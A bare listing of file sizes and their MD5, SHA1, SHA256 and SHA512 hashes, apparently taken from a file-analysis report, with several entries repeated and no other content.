SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
153B
MD540dfffb163bd48b6044002ca2f43b6b4
SHA1c7c3860192be125ff057640b71572e0832f5e585
SHA256cca43c5207cbc92221e4870432c65e9ba22892cf3760e66c3ba34efbca035a6c
SHA512aeaaff7c8bcea0925a946e51f19584313582f3cf41497c5cc3c258be791014120fcaff645ce24e32c89a1853c28efe112e59617e7fb2be3c6eda3863835305ce
-
Filesize
9.8MB
MD5743022328f955e2cbb5f2f375bd0ab72
SHA1226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83
-
Filesize
9.8MB
MD5743022328f955e2cbb5f2f375bd0ab72
SHA1226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83
-
Filesize
9.8MB
MD5743022328f955e2cbb5f2f375bd0ab72
SHA1226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83
-
Filesize
9.8MB
MD5743022328f955e2cbb5f2f375bd0ab72
SHA1226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83
-
Filesize
9.8MB
MD5743022328f955e2cbb5f2f375bd0ab72
SHA1226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83
-
Filesize
1.6MB
MD508e3930a42197a422d064569c4778997
SHA174832aa332b48422e5d448f5099b397e84c18712
SHA256322626ca37f3929c517b4c0ceeb130836be5f36a1eb68ab0adb00c0f4a3f3813
SHA512b70952bc3cd54abcc2c7c1c71b1f16d96a001900574237263a210512a348542e6ec7a05e7fcc0ff5831a200db23fae06f2bbb0f0bb249599fed0fa1761516368
-
Filesize
1.6MB
MD508e3930a42197a422d064569c4778997
SHA174832aa332b48422e5d448f5099b397e84c18712
SHA256322626ca37f3929c517b4c0ceeb130836be5f36a1eb68ab0adb00c0f4a3f3813
SHA512b70952bc3cd54abcc2c7c1c71b1f16d96a001900574237263a210512a348542e6ec7a05e7fcc0ff5831a200db23fae06f2bbb0f0bb249599fed0fa1761516368
-
Filesize
1.6MB
MD508e3930a42197a422d064569c4778997
SHA174832aa332b48422e5d448f5099b397e84c18712
SHA256322626ca37f3929c517b4c0ceeb130836be5f36a1eb68ab0adb00c0f4a3f3813
SHA512b70952bc3cd54abcc2c7c1c71b1f16d96a001900574237263a210512a348542e6ec7a05e7fcc0ff5831a200db23fae06f2bbb0f0bb249599fed0fa1761516368
-
Filesize
1.7MB
MD5eb85c562249e96d7a946111241f0ea4b
SHA15c89db5dad53c26ec1f8189261a7fc4eace18773
SHA25695f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77
-
Filesize
1.7MB
MD5eb85c562249e96d7a946111241f0ea4b
SHA15c89db5dad53c26ec1f8189261a7fc4eace18773
SHA25695f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77
-
Filesize
1.7MB
MD5eb85c562249e96d7a946111241f0ea4b
SHA15c89db5dad53c26ec1f8189261a7fc4eace18773
SHA25695f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77